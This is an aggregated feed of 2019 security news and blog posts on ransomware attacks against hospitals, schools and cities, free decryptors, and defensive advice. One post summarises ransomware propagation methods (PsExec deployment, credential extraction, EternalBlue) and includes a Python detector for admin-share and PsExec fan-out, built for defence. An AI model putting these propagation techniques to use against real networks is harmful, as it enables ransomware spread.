In August, security researchers at Emsisoft released a decryptor tool that allows the victims of the JSWorm 4.0 ransomware to decrypt their files for free. In May Emsisoft experts released a free Decrypter tool for the JSWorm 2.0 variant.

In July the company released other free decryptors for the LooCipher ransomware, the ZeroFucks ransomware, and the Ims00rry ransomware.

Pierluigi Paganini

(SecurityAffairs – ransomware, hacking)

The post Emsisoft releases a free decryptor for the WannaCryFake ransomware appeared first on Security Affairs.

Free Decryptors Released for Two Ransomware Families

Security researchers have released decryption tools which victims of two different ransomware families can use to recover their files for free. On 25 September, Kaspersky Lab unveiled decryptors for both the Yatron and FortuneCrypt crypto-ransomware families. In its analysis of the first threat, the Russian security firm found that Yatron derived much of its code […]… Read More

The post Free Decryptors Released for Two Ransomware Families appeared first on The State of Security.

Older vulnerabilities and those with lower severity scores still being exploited by ransomware

Almost 65% of top vulnerabilities used in enterprise ransomware attacks targeted high-value assets like servers, close to 55% had CVSS v2 scores lower than 8, nearly 35% were old (from 2015 or earlier), and the vulnerabilities used in WannaCry are still being used today, according to RiskSense. The data was gathered from a variety of sources including RiskSense proprietary data, publicly available threat databases, as well as findings from RiskSense threat researchers and penetration testers. … More

The post Older vulnerabilities and those with lower severity scores still being exploited by ransomware appeared first on Help Net Security.

WanaCry Ransomware still a threat two years on – HackingVision

Widely infamous WanaCry Ransomware is still a threat two years on. WanaCry Ransomware and the EternalBlue exploit are still causing problems two years on. In May of 2017 the cryptoworm ransomware WanaCry started to target systems worldwide; the ransomware was targeting computers and devices ... Read more

The post WanaCry Ransomware still a threat two years on – HackingVision appeared first on HackingVision.

Campbell County Memorial Hospital in Wyoming hit by ransomware attack

Campbell County Memorial Hospital in Gillette, Wyoming is facing service disruptions after a ransomware attack hit its computer systems on Friday.

On Friday, the Campbell County Memorial Hospital in Gillette, Wyoming, suffered a ransomware attack that is still causing service disruptions.

“Campbell County Health has been the victim of a ransomware attack. All CCH computer systems have been affected, which impacts the organization’s ability to provide patient care,” reads a statement published by the Campbell County Health.

All updates are available at: www.cchwyo.org/sd. Public Update 9/22/19, 2:30 pm: Campbell County Health continues to…

Posted by Campbell County Health on Friday, 20 September 2019

The ransomware attack is having a dramatic impact on the operations at the hospital: the staff has canceled some surgeries, as well as respiratory therapy and radiology exams and procedures. The hospital has temporarily halted new inpatient admissions.

“Campbell County Health continues to have service disruptions, however, the Emergency Medical Services (EMS), the Emergency Department, Maternal Child (OB) and the Walk-in Clinic are open to assess patients and treat or transfer patients as appropriate.” reads an update published by the hospital. “It is advised to call to confirm your appointment prior to going in. All patients are also asked to bring medication bottles with them to their appointment.”

Immediately after the discovery of the attack, the hospital announced that patients presenting to the emergency department and walk-in clinic would be assessed and transferred to an appropriate care facility if needed.

“We are working with regional facilities to transfer patients to if we are not able to provide safe care. The Emergency Department is open and staffed with our expert team of physicians and nursing to assess and evaluate patient care needs,” announced the Campbell County Health.

According to the management at the Campbell County Health hospital, patient and employee data was not accessed in the ransomware attack.

The organization reported the incident to the authorities, which are still investigating the security breach.

“At this point in time, there is no evidence that any patient data has been accessed or misused. The investigation is ongoing, and we will provide updates when more information becomes available. We are working diligently to restore complete access to our services,” Campbell County Health added.

As of Sunday, the majority of the services at the hospital were restored; however, patients are invited to call in advance to confirm their appointments.

Recently several US cities have suffered ransomware attacks, in August at least 23 Texas local governments were targeted by coordinated attacks.

Some cities in Florida were also victims of hackers, including Key Biscayne, Riviera Beach and Lake City. In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

The list of ransomware attacks is long and includes schools in Louisiana and Alabama.

Health organizations weren’t spared either, LabCorp and Hancock Health being only two of the most recently affected.

Pierluigi Paganini

(SecurityAffairs – Campbell County Memorial Hospital, hacking)

The post Campbell County Memorial Hospital in Wyoming hit by ransomware attack appeared first on Security Affairs.

Key threats and trends SMB IT teams deal with

MSPs are significantly more concerned with internal data breaches and rapidly evolving technology practices, whereas internal IT teams are more concerned with employee behavior/habits, according to a Central by LogMeIn report. The global survey, which polled 500 IT professionals across North America and Europe, also showed that top security concerns remain consistent year over year with 54 percent of IT professionals ranking malware as their number one security concern, followed by ransomware (46 percent) and … More

The post Key threats and trends SMB IT teams deal with appeared first on Help Net Security.

Eight great habits that enterprises can practice for bolstering cybersecurity


Efficient cybersecurity is built on the foundation of good habits practised by internal customers. Enterprises may think a great deal about implementing effective cybersecurity practices and have plenty of meetings, but it’s actually not that complicated.

An effective framework is the first step, but more important is ensuring effective habit formation.

Unfortunately, enterprises are populated by humans who like to take the easier but riskier way out. Whether it’s setting the same password across all accounts, leaving data freely available or using company devices on risky Wi-Fi networks, bad habits can be problematic.

Here are a few tendencies that should be eliminated as soon as possible.

  1. Weak passwords

The problem with weak passwords is an issue that plagues an entire organization, from the top to the bottom. It’s not enough to have a policy about strong passwords – it’s also important to run regular campaigns across the entire organization with real-life case studies to educate employees on the importance of using strong passwords and how to do so.

  2. A lack of a security policy

The lack of a single unified security policy is an extremely bad enterprise security habit. A proper policy keeps all information and strategies in one place, becoming a one-stop repository in case of crises. Without a security policy, it is difficult for enterprises to remain protected.

  3. Taking shortcuts

When enterprises underestimate the damage cyberattacks can cause, the propensity is to run towards shortcuts. This means being reactionary to attacks and not taking cybersecurity seriously: running the most basic of solutions and not investing much time and energy. This is a recipe for disaster. Cybersecurity is an extremely important function of an enterprise today and needs to be taken as seriously as any other function.

  4. Forgetting to have cybersecurity drills

Just like fire safety drills, it’s important to have regular cybersecurity drills. This inculcates preparedness into employees and gives them an idea of what happens during a cyberattack. But many organizations go for months and years without having one. This makes them extremely unprepared in the event of an actual cyber attack.

  5. Delayed patching and updating

Vulnerabilities in different enterprise software are often found every day and patches & updates are released to keep businesses safe from a cyber strike. But organizations can often be guilty of not being up-to-date on patching software for vulnerabilities. Hackers and cybercriminals are aware of this and often use these vulnerabilities to enter systems and cause immense chaos.

  1. Not investing in backup

An enterprise security framework goes a long way in enabling protection and strong solutions can also play a part. But it’s always important to have a fallback plan and that is where backup comes in. By backing up critical data at regular intervals, enterprises can ensure they have something to fall back on, in case of critical situations. However, many enterprises neglect this important step and as a result, put themselves at great risk in the event of unforeseen circumstances.

  1. Underestimating social engineering

Many enterprises can slip into the notion that cybersecurity is purely a technological problem and putting in place, a strong cybersecurity solution can solve all problems. But that is not the case – social engineering is as big an issue as cybersecurity, nowadays. The only way to solve this is to ensure that employees are as well- versed in cybersecurity issues.

  1. The problem with access control

Access control is an issue almost every organization struggles with. They may have the strongest firewalls but it can be sometimes of no use if every user in the organization has access to everything. That makes the company very susceptible to insider breaches. This also means that, if a hacker manages to gain control of a system with access to the network he can break the entire IT infrastructure.

Seqrite’s Unified Threat Management (UTM) provides a one-stop solution for many of the problems identified above. It acts as the first line of defence, providing IT security management, a safe working environment, high productivity and regulatory compliance in a cost-effective way.

The post Eight great habits that enterprises can practice for bolstering cybersecurity appeared first on Seqrite Blog.

Over 12,000 WannaCry Variants Detected in the Wild

Security researchers have determined that over 12,000 variants of the WannaCry ransomware family are preying upon users in the wild. Sophos attributed this rise of variants to threat actors taking the original 2017 WannaCry binary and modifying it to suit their needs. These versions have subsequently produced numerous infection attempts. In August 2019, for instance, […]… Read More

The post Over 12,000 WannaCry Variants Detected in the Wild appeared first on The State of Security.

TFlower Ransomware Targeting Businesses via Exposed RDS

A new crypto-ransomware threat called “TFlower” is targeting corporate environments via exposed Remote Desktop Services (RDS). First discovered in August, the ransomware makes its way onto a corporate network after attackers hack into a machine’s exposed Remote Desktop Services. This attack vector enables bad actors to infect the local machine with TFlower. At that point, […]… Read More

The post TFlower Ransomware Targeting Businesses via Exposed RDS appeared first on The State of Security.

District in Rockford Public Schools Confirms Ransomware Attack

A district within the Rockford Public Schools (RPS) system has confirmed it suffered a ransomware attack that affected parts of its network. On 6 September, District 205 of RPS posted a statement on Facebook in which it noted that its Internet, phones and information systems used to track attendance and student records were down. The […]… Read More

The post District in Rockford Public Schools Confirms Ransomware Attack appeared first on The State of Security.

10 of the Most Significant Ransomware Attacks of All Time

For years, ransomware actors have developed new families and attack campaigns with increasing frequency and in increasing numbers. Such activity peaked in 2017 but then fell in tandem with cryptocurrency miners’ rise. This development was short-lived, however. Between Q4 2018 and Q1 2019, Malwarebytes observed a 195 percent increase in ransomware detections involving business targets. The rate […]… Read More

The post 10 of the Most Significant Ransomware Attacks of All Time appeared first on The State of Security.

Fake PayPal Website Distributes New Variant of Nemty Ransomware

Digital attackers created a fake PayPal website to distribute samples of a new variant of the Nemty crypto-ransomware family. Security researcher nao_sec uncovered the ransomware variant after they came across a fake PayPal website. This site promised users a return of 3-5 percent for making purchases through its payment system. But its primary purpose was […]… Read More

The post Fake PayPal Website Distributes New Variant of Nemty Ransomware appeared first on The State of Security.

Ransomware Attackers Demanded $5.3M from City of New Bedford

Digital criminals demanded $5.3 million in ransom from the City of New Bedford, Massachusetts following a ransomware attack. Jon Mitchell, Mayor of New Bedford, explained in a press briefing that the ransom demand came shortly after the City’s Management Information Systems (MIS) staff detected a ransomware attack in the early morning hours of 5 July […]… Read More

The post Ransomware Attackers Demanded $5.3M from City of New Bedford appeared first on The State of Security.

Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment

Ransomware is a global threat targeting organizations in all industries. The impact of a successful ransomware event can be material to an organization - including the loss of access to data, systems, and operational outages. The potential downtime, coupled with unforeseen expenses for restoration, recovery, and implementation of new security processes and controls can be overwhelming. Ransomware has become an increasingly popular choice for attackers over the past few years, and it’s easy to understand why given how simple it is to leverage in campaigns – while offering a healthy financial return for attackers.

In our latest report, Ransomware Protection and Containment Strategies: Practical Guidance for Endpoint Protection, Hardening, and Containment, we discuss steps organizations can proactively take to harden their environment to prevent the downstream impact of a ransomware event. These recommendations can also help organizations with prioritizing the most important steps required to contain and minimize the impact of a ransomware event after it occurs.

Ransomware is commonly deployed across an environment in two ways:

  1. Manual propagation by a threat actor after they’ve penetrated an environment and have administrator-level privileges broadly across the environment:
    • Manually run encryptors on targeted systems.
    • Deploy encryptors across the environment using Windows batch files (mount C$ shares, copy the encryptor, and execute it with the Microsoft PsExec tool).
    • Deploy encryptors with Microsoft Group Policy Objects (GPOs).
    • Deploy encryptors with existing software deployment tools utilized by the victim organization.
  2. Automated propagation:
    • Credential or Windows token extraction from disk or memory.
    • Trust relationships between systems – and leveraging methods such as Windows Management Instrumentation (WMI), SMB, or PsExec to bind to systems and execute payloads.
    • Unpatched exploitation methods (e.g., EternalBlue – addressed via Microsoft Security Bulletin MS17-010).
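An added example, not code from the report: a small Python detection routine for the manual-propagation pattern in item 1 (admin shares mounted on many hosts in quick succession, with PsExec's PSEXESVC service appearing on those hosts), run over constructed Windows event records. The field names, the 15-minute window and the 3-host threshold are assumptions for this illustration.

```python
"""Flag the admin-share + PsExec fan-out pattern described above
(mount C$/ADMIN$ on many hosts, copy the encryptor, start it via PsExec).

The event records are a constructed, simplified rendering of two
Windows event types:
  5140 (Security): a network share object was accessed
  7045 (System):   a new service was installed (PsExec installs PSEXESVC)
"""
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_SHARES = {"C$", "ADMIN$"}
PSEXEC_SERVICE = "PSEXESVC"

# Constructed sample events: one account (CORP\admin_ops) touching four hosts
# within a few minutes, PSEXESVC appearing on three of them, plus benign noise
# (a backup account on a single host, a non-admin share, an unrelated service).
SAMPLE_EVENTS = [
    {"ts": "2019-10-01T01:30:00", "id": 5140, "host": "FS01", "src_ip": "10.0.9.9",
     "user": "CORP\\svc_backup", "share": "\\\\*\\C$"},
    {"ts": "2019-10-01T02:00:05", "id": 5140, "host": "FS01", "src_ip": "10.0.5.25",
     "user": "CORP\\admin_ops", "share": "\\\\*\\C$"},
    {"ts": "2019-10-01T02:00:30", "id": 7045, "host": "FS01", "service": "PSEXESVC",
     "image": "%SystemRoot%\\PSEXESVC.exe"},
    {"ts": "2019-10-01T02:01:10", "id": 5140, "host": "WS02", "src_ip": "10.0.5.25",
     "user": "CORP\\admin_ops", "share": "\\\\*\\ADMIN$"},
    {"ts": "2019-10-01T02:01:35", "id": 7045, "host": "WS02", "service": "PSEXESVC",
     "image": "%SystemRoot%\\PSEXESVC.exe"},
    {"ts": "2019-10-01T02:02:00", "id": 5140, "host": "WS02", "src_ip": "10.0.7.7",
     "user": "CORP\\jsmith", "share": "\\\\*\\Public"},
    {"ts": "2019-10-01T02:02:40", "id": 5140, "host": "WS03", "src_ip": "10.0.5.25",
     "user": "CORP\\admin_ops", "share": "\\\\*\\C$"},
    {"ts": "2019-10-01T02:03:05", "id": 7045, "host": "WS03", "service": "PSEXESVC",
     "image": "%SystemRoot%\\PSEXESVC.exe"},
    {"ts": "2019-10-01T02:03:30", "id": 7045, "host": "WS04", "service": "EdrAgent",
     "image": "C:\\Program Files\\EDR\\agent.exe"},
    {"ts": "2019-10-01T02:04:15", "id": 5140, "host": "WS04", "src_ip": "10.0.5.25",
     "user": "CORP\\admin_ops", "share": "\\\\*\\C$"},
]


def share_name(share: str) -> str:
    # The 5140 ShareName field is UNC-style, e.g. \\*\C$ ; keep only the last part.
    return share.rsplit("\\", 1)[-1].upper()


def analyze(events, window_minutes=15, min_hosts=3):
    """Return one finding per (source IP, account) that accessed an admin share
    on at least `min_hosts` distinct hosts inside a `window_minutes` window.
    Hosts where PSEXESVC was installed inside that same window are listed
    separately; their presence raises severity from 'medium' to 'high'."""
    window = timedelta(minutes=window_minutes)
    share_hits = defaultdict(list)       # (src_ip, user) -> [(time, host), ...]
    psexec_installs = defaultdict(list)  # host -> [time, ...]

    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        if ev["id"] == 5140 and share_name(ev["share"]) in ADMIN_SHARES:
            share_hits[(ev["src_ip"], ev["user"])].append((t, ev["host"]))
        elif ev["id"] == 7045 and ev.get("service", "").upper() == PSEXEC_SERVICE:
            psexec_installs[ev["host"]].append(t)

    findings = []
    for (src_ip, user), hits in share_hits.items():
        # Slide a window over this actor's admin-share accesses and report the
        # first window that reaches the fan-out threshold.
        for start, _ in hits:
            end = start + window
            hosts = {h for t, h in hits if start <= t <= end}
            if len(hosts) < min_hosts:
                continue
            psexec_hosts = sorted(
                h for h in hosts
                if any(start <= t <= end for t in psexec_installs.get(h, []))
            )
            findings.append({
                "src_ip": src_ip,
                "user": user,
                "window_start": start.isoformat(),
                "hosts": sorted(hosts),
                "psexec_hosts": psexec_hosts,
                "severity": "high" if psexec_hosts else "medium",
            })
            break
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["user"], "from", f["src_ip"],
              "touched admin shares on", ", ".join(f["hosts"]),
              "| PSEXESVC on", ", ".join(f["psexec_hosts"]) or "none")
```

In a real environment the same logic would consume forwarded 5140/7045 events from a SIEM; legitimate admin tooling also uses admin shares, so tune the thresholds and allow-list known deployment accounts.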

The report covers several technical recommendations to help organizations mitigate the risk of and contain ransomware events including:

  • Endpoint segmentation
  • Hardening against common exploitation methods
  • Reducing the exposure of privileged and service accounts
  • Cleartext password protections

If you are reading this report to aid your organization’s response to an existing ransomware event, it is important to understand how the ransomware was deployed through the environment and design your ransomware response appropriately. This guide should help organizations in that process.

Read the report today.

*Note: The recommendations in this report will help organizations mitigate the risk of and contain ransomware events. However, this report does not cover all aspects of a ransomware incident response. We do not discuss investigative techniques to identify and remove backdoors (ransomware operators often have multiple backdoors into victim environments), communicating and negotiating with threat actors, or recovering data once a decryptor is provided.

Cyber Security Roundup for August 2019

Twitter boss Jack Dorsey had his Twitter account hacked at the end of August, with hackers using his account to send a stream of offensive messages to his 4.2 million followers. It appears Jack was using his mobile phone to provide multi-factor authentication access to his Twitter account, a good solid security practice to adopt; however, it appears his Twitter account password and his mobile phone SMS service were both compromised, the latter probably due either to SIM card swap fraud social engineering by the hacker, or to an insider at his mobile network service provider.

A database holding over a million fingerprints and personal data was exposed on the net by Suprema, a biometric security company. Researchers at VPNMentor didn't disclose how they were able to find and access the 'Biostar 2' database, nor how long the data was accessible online. Biostar 2 is used by 5,700 organisations, including governments, banks and the UK Metropolitan Police. In a similar fashion, an independent researcher found a 40Gb Honda Motor Company database exposed online.

TfL took their Oyster system offline to 'protect customers' after a credential stuffing attack led to the compromise of 1,200 Oyster customer accounts. A TfL spokesman said 'We will contact those customers who we have identified as being affected and we encourage all customers not to use the same password for multiple sites.' I was also directly made aware that restaurant chain TGI Friday was also hit by credential stuffing attack(s), after it urgently warned its UK customers on the importance of using strong unique passwords for its reward scheme.

It was another bumper 'Patch Tuesday', with Microsoft releasing security updates for 93 security vulnerabilities, including 31 which are 'critical' rated in Windows, Server 2019, IE, Office, SharePoint and Chakra Core.

Amongst the Microsoft patch release were patches for two serious 'BlueKeep' or 'WannaCry'-style wormable vulnerabilities in Windows Remote Desktop Services, CVE-2019-1181 and CVE-2019-1182. A Microsoft Security Response Center (MSRC) blog post said Microsoft had found the vulnerabilities as part of a project to make Remote Desktop Services more secure, and stated 'future malware that exploits these could propagate from vulnerable computer to vulnerable computer without user interaction.' The fixes for these are available for download in the Microsoft Security Update Guide.

A United Nations report concluded North Korea funded its weapons programme to the tune of $2 billion from the profits of cyber attacks. 'Democratic People’s Republic of Korea cyber actors, many operating under the direction of the Reconnaissance General Bureau, raise money for its WMD (weapons of mass destruction) programmes, with total proceeds to date estimated at up to two billion US dollars,' the UN report said. The report referred to at least 35 instances of North Korean-sponsored cryptomining activity or attacks on financial companies and cryptocurrency exchanges. The attacks spanned a total of 17 countries and were designed to generate funds that would be hard to trace and elude regulatory oversight.


7 Questions to Ask Your Child’s School About Cybersecurity Protocols

Just a few weeks into the new school year and, already, reports of malicious cyberattacks in schools have hit the headlines. While you’ve made digital security strides in your home, what concerns if any should you have about your child’s data being compromised at school?

There’s a long and short answer to that question. The short answer is don’t lose sleep (it’s out of your control) but get clarity and peace of mind by asking your school officials the right questions. 

The long answer is that cybercriminals have schools in their digital crosshairs. According to a recent report in The Hill, school districts are becoming top targets of malicious attacks, and government entities are scrambling to fight back. These attacks are costing school districts (taxpayers) serious dollars and costing kids (and parents) their privacy.


Prime Targets

According to one report, a U.S. school district becomes the victim of a cyberattack as often as every three days. The reason for this is that cybercriminals want clean data to exploit for dozens of nefarious purposes. The best place to harvest pure data is schools, where social security numbers are usually unblemished and go unchecked for years. At the same time, student data can be collected and sold on the dark web. Data at risk include vaccination records, birthdates, addresses, phone numbers, and contacts used for identity theft.

Top three cyberthreats

The top three threats against schools are data breaches, phishing scams, and ransomware. Data breaches can happen through phishing scams and malware attacks that could include malicious email links or fake accounts posing as acquaintances. In a ransomware attack, a hacker locks down a school’s digital network and holds data for a ransom. 

Over the past month, hackers have hit K-12 schools in New Jersey, New York, Wisconsin, Virginia, Oklahoma, Connecticut, and Louisiana. Universities are also targeted.

In the schools impacted, criminals were able to find loopholes in their security protocols. A loophole can be an unprotected device, a printer, or a malicious email link opened by a new employee. It can even be a calculated scam like the Virginia school duped into paying a fraudulent vendor $600,000 for a football field. The cybercrime scenarios are endless. 

7 key questions to ask

  1. Does the school have a data security and privacy policy in place, as well as a cyberattack response plan?
  2. Does the school have a system to educate staff, parents, and students about potential risks and safety protocols?
  3. Does the school have a data protection officer on staff responsible for implementing security and privacy policies?
  4. Does the school have reputable third-party vendors to ensure the proper technology is in place to secure staff and student data?
  5. Are data security and student privacy a fundamental part of onboarding new school employees?
  6. Does the school create backups of valuable information and store them separately from the central server to protect against ransomware attacks?
  7. Does the school have any new technology initiatives planned? If so, how will it address student data protection?

The majority of schools are far from negligent. Leaders know the risks, and many have put recognized cybersecurity frameworks in place. Also, schools have the pressing challenge of 1) providing a technology-driven education to students while at the same time, 2) protecting student/staff privacy and 3) finding funds to address the escalating risk.

Families can add a layer of protection to a child’s data while at school by making sure devices are protected in a Bring Your Own Device (BYOD) setting. Cybersecurity is a shared responsibility. While schools work hard to implement safeguards, be sure you are taking responsibility in your digital life and equipping your kids to do the same. 

 

The post 7 Questions to Ask Your Child’s School About Cybersecurity Protocols appeared first on McAfee Blogs.

Cyber News Rundown: Hookup App Exposes Users


Hookup App Leaks User Locations

Geo-location and other sensitive data has been leaked from the hookup app 3fun, exposing the information of more than 1.5 million users. While some dating apps use trilateration to find nearby users, 3fun showed location data capable of tracing a user to a specific building or floor. Though users had the option to disable coordinate tracking, that data was nevertheless stored and available through the app’s API. 3fun has since resolved the leak and has hopefully implemented stronger security measures, considering the private nature of their clients’ activities.

Ransomware Attacks on DSLR Cameras

Malware authors continue to find new victims, as a ransomware variant has been found to be remotely attacking Canon DSLR cameras and demanding a ransom to regain access to the device. Researchers have found multiple vulnerabilities that could allow attackers to perform any number of critical functions on the cameras, including displaying a ransom note and remotely taking pictures with the camera. Fortunately, Canon has already begun issuing patches for some of its affected devices, though it’s taking longer to fully secure others.


Google Drive Exploit Allows Phishing Campaign to Flourish

A new phishing campaign has been discovered that uses a legitimate Google Drive account to deliver an email impersonating the CEO, asking the victim to open a Google Docs file and navigate to the phishing site’s landing page. Luckily for victims, the campaign has a few tells. The phony CEO email address uses a non-conforming naming convention, and the email itself appears to be a hastily compiled template.

British Airways Data Leak

British Airways has again come under scrutiny, this time after it was discovered that their e-ticketing system was leaking sensitive passenger data. The leak stems from flight check-in links that were sent out to customers containing both their surname and booking confirmation numbers completely unencrypted within the URL. Even more worrisome, this type of vulnerability has been well-known since last February when several other airlines were found to have the same issue by the same security firm.

Android Trojan Adds New Functionality

Following in the footsteps of Anubis, an Android banking Trojan for which source code was recently revealed, Cerberus has quickly filled the void without actually borrowing much of that code. One major change is that Cerberus implemented a new method of checking if the device is physically moving or not, in hopes of avoiding detection by both the victim and any researchers who may be analyzing it. Additionally, this variant uses phishing overlays from several popular sites to further collect any login credentials or payment card data.

The post Cyber News Rundown: Hookup App Exposes Users appeared first on Webroot Blog.

Cyber Security Roundup for July 2019

July was a month of mega data privacy fines. The UK Information Commissioner's Office (ICO) announced it intended to fine British Airways £183 million for last September's data breach, where half a million BA customer personal records were compromised. The ICO also announced a £100 million fine for US-based Marriott Hotels after the hotel chain said 339 million guest personal data records had been compromised by hackers. Those fines were dwarfed on the other side of the pond, with Facebook agreeing to pay a US Federal Trade Commission (FTC) fine of $5 billion to put the Cambridge Analytica privacy scandal to bed. And Equifax paid $700 million to the FTC to settle their 2017 data breach, which involved the loss of at least 147 million personal records. Big numbers indeed; we are seeing the big stick of the GDPR kicking in within the UK, and the FTC flexing some serious privacy rights protection punishment muscles in the US. All 'food for thought' when performing cybersecurity risk assessments.

Through a Freedom of Information request, the UK Financial Conduct Authority (FCA) disclosed a sharp rise of over 1000% in cyber-incidents within the UK financial sector in 2018. In my view, this rise was fueled by the mandatory data breach reporting requirement of the GDPR, given it came into force in May 2018. I also think the finance sector was reluctant to report security weakness pre-GDPR, over fears of damaging their customer trust. Would you trust and use a bank if you knew its customers were regularly hit by fraud?

Eurofins Scientific, the UK's largest forensic services provider, which was taken down by a mass ransomware attack last month, paid the cybercrooks' ransom according to BBC News. It wasn't disclosed how much Eurofins paid, but it is highly concerning when large ransoms are paid, as it fuels further ransomware attacks.

A man was arrested on suspicion of carrying out a cyberattack against Lancaster University. The UK National Crime Agency said the university had been compromised and "a very small number" of student records, phone numbers and ID documents were accessed. In contrast, the FBI arrested a 33-year-old software engineer from Seattle; she is alleged to have taken advantage of a misconfigured web application firewall to steal a massive 106 million personal records from Capital One. A stark reminder of the danger of misconfiguring and mismanaging IT security components.

The Huawei international political rhetoric and bun fighting has gone into retreat. UK MPs said there were no technological grounds for a complete Huawei ban, while Huawei said they were 'confident' the UK will choose to include it within 5G infrastructure. Even the White House said it would start to relax the United States Huawei ban. It seems something behind the scenes has changed; this reversal in direction is more likely to be financially motivated than security motivated, in my rather cynical view.

A typically busy month for security patch releases, with Microsoft, Adobe and Cisco all releasing the expected barrage of security updates for their products. There were security updates released by Apple as well; however, Google researchers announced six iPhone vulnerabilities, including one that remains unpatched.


MegaCortex Returns…

MegaCortex, a ransomware which was first spotted in January this year, has become active again and has changed the way it previously attacked/targeted the corporate world. In order to simplify its execution and increase its scale of operation, it uses ‘Command Prompt’ instead of ‘PowerShell’ in its current targeted campaign. Key…

School of Cyberthreats: 3 Attacks Impacting Today’s Schools

Educational institutions are data-rich gold mines. From student and employee records to sensitive financial information, schools contain a plethora of data that can be obtained by cybercriminals rather easily due to lack of security protocols. This fact has cybercriminals pivoting their strategies, leading to a recent uptick in attacks on the education sector in the United States and around the world. In fact, there are three main threats impacting schools — data breaches, phishing, and ransomware. Let’s take a look at each of these threats, how cybercriminals have executed them, and the precautions students can take in the future.

Data Breaches

Nearly half of the cyberattacks that impacted schools in 2018 were data breaches, which occur when an unauthorized third party gains access to a school’s network. From there, cybercriminals gain access to a host of private information on employees and students, including names, dates of birth, addresses, phone numbers, email addresses, and Social Security numbers. After an attack of this nature occurs, educational institutions reassess their current cybersecurity strategy. This usually entails revisiting privacy settings and reviewing all security protocols.

Phishing

Even the savviest email user can fall for a phishing scheme. These types of schemes usually entail tricking teachers or students out of private information or money. When cybercriminals send emails with fraudulent links, unsuspecting users click on that link because the web address is usually only off by one or two letters. Once the scammer has been given access through the malicious link, they get to work obtaining private information contained on the device. Using this data, they can enact further schemes. There have even been cases of cybercriminals impersonating deans or teachers asking for gift cards, which is a type of spear-phishing where scammers take the information they have obtained about a victim and use it to their advantage. The good news? Users can prevent against these sneaky attacks by staying vigilant and applying security best practices.

Ransomware

When ransomware hits, schools don’t really have a lot of options. If they have data backups in place, then they don’t have to pay the ransom, otherwise educational institutions have no choice but to completely shut down. Considering how much technology has been integrated into classrooms, this isn’t surprising. A ransomware attack usually occurs when a school district’s system is infiltrated by a virus intending to bring operations to a halt. Cybercriminals hold systems hostage for a certain amount of money or ransom until the district decides to pay. The data that is held can range from a variety of things – lesson plans, financial information, personal employee and student records. There aren’t many ways for schools to bypass these types of attacks unless they are prepared beforehand. One way to be prepared is to back up files in multiple places, such as an external hard drive or cloud.

With the uptick in overall cyberthreats against schools, more and more educational institutions need to put protocols into place to avoid the multitude of ever-growing threats. However, students can do their part in prioritizing cybersecurity by following these tips to ensure personal data is secure:

  1. Watch what you are clicking. Phishing schemes are becoming craftier. A too good to be true study guide or deal on a textbook might end in a compromised system. It is always best to check directly with the source of the email or link before handing over money or data.
  2. Make sure you recognize the sender. When responding to a message, first check to see if you recognize the sender’s name and email address. If it looks strange, ignore the message. If you are unsure, check with the sender in person.
  3. Never reuse passwords. Many users reuse the same passwords or slight variations of it, across all of their accounts. That means if a hacker uncovers one password, all other accounts are put at risk. So, it is crucial to use different passcodes to ensure hackers cannot obtain access to all of your accounts.
  4. Stay on a secure network. If you connect to public Wi-Fi, be sure the network is secure. If it is not, consider using a virtual private network (VPN).
  5. Install security software on all devices. Security doesn’t begin or end with personal computers. All devices need to be protected with comprehensive security software, including mobile devices and tablets.
  6. Make sure all device software is up-to-date. This is one of the easiest and best ways to secure devices against threats, as developers are constantly releasing patches for vulnerabilities and flaws.

And as always, if you are interested in learning more about IoT and mobile security trends and information, follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post School of Cyberthreats: 3 Attacks Impacting Today’s Schools appeared first on McAfee Blogs.

Cyber Security Roundup for June 2019

Keep Patching!
June 2019 was another very busy month for security update releases. Microsoft released updates to patch 22 critical rated vulnerabilities, Intel released 11 fixes, and there were also several critical security updates for Apple Airport, Adobe Flash Player, Cisco devices, Cisco Data Centre Network Manager, Dell SupportAssist, Google Chrome, Firefox and Apache. One further standout vulnerability was the "SACK Panic" TCP Linux and FreeBSD kernel vulnerability, uncovered by Netflix researchers; Microsoft also released a security advisory in regards to TCP SACK Panic by the end of the month.

The National Security Agency (NSA) backed up UK National Cyber Security Centre (NCSC) and Microsoft’s continuing strong recommendations for everyone to apply the latest security updates to all versions of Microsoft Windows, including the unsupported XP, Vista and Windows 2003 Server, to protect against the supercritical CVE-2019-0708 “BlueKeep” vulnerability.

More Major Ransomware Attacks coming to the UK?
We all know the United States government famously takes a stand of no negotiation with terrorists and kidnappers, with the specific policy of never paying ransom demands. There is a good reason for this policy, as paying ransoms just serves to encourage further kidnapping and ransom demands. So it was interesting to learn this month that US local government does not adhere to the same policy when dealing with ransomware demands. Riviera Beach (Florida) paid a whopping $600,000 ransom to hackers after its computer systems were taken over by ransomware after an employee clicked on a link within a phishing email. Phishing emails are the typical starting ingress of most mass ransomware outbreaks which cripple organisations. The Lake City (Florida) government officials said they had also paid a $460,000 ransom to cybercrooks following a ransomware attack on their municipality on 10th June. Meanwhile, Baltimore officials approved $10 million to cover ongoing expenses related to its ransomware attack.

Paying ransomware demands will fuel further ransomware attacks, so I expect ransomware attacks to further escalate. So the big question is, can we expect further UK local government authorities and large organisations to be hard hit by mass ransomware outbreaks? The answer to that will come down to how good their patch management is, and whether lessons have been truly learnt from the destructive 2017 WannaCry ransomware outbreaks, which took down a number of NHS services. Given the recent BlueKeep Microsoft Windows critical vulnerability is expected to spark new strains of ransomware in the coming months, ransomware very much like WannaCry with the devastating capability of rapidly infecting and propagating via unpatched Microsoft Windows systems connected to flat networks, we shall soon find out.

Data Breaches
No major UK data breaches were reported in June 2019, but on the other side of the pond, a misconfigured AWS S3 bucket managed by a data integration company led to confidential data from Netflix, TD Bank, Ford and other companies being exposed. And a misconfigured MongoDB database resulted in 5 million personal records left open to the public via a website. Data breaches caused by misconfigured cloud services operated by third parties are becoming a bit of a regular theme.

APT10 Cloud Hopper Campaign further Exposed
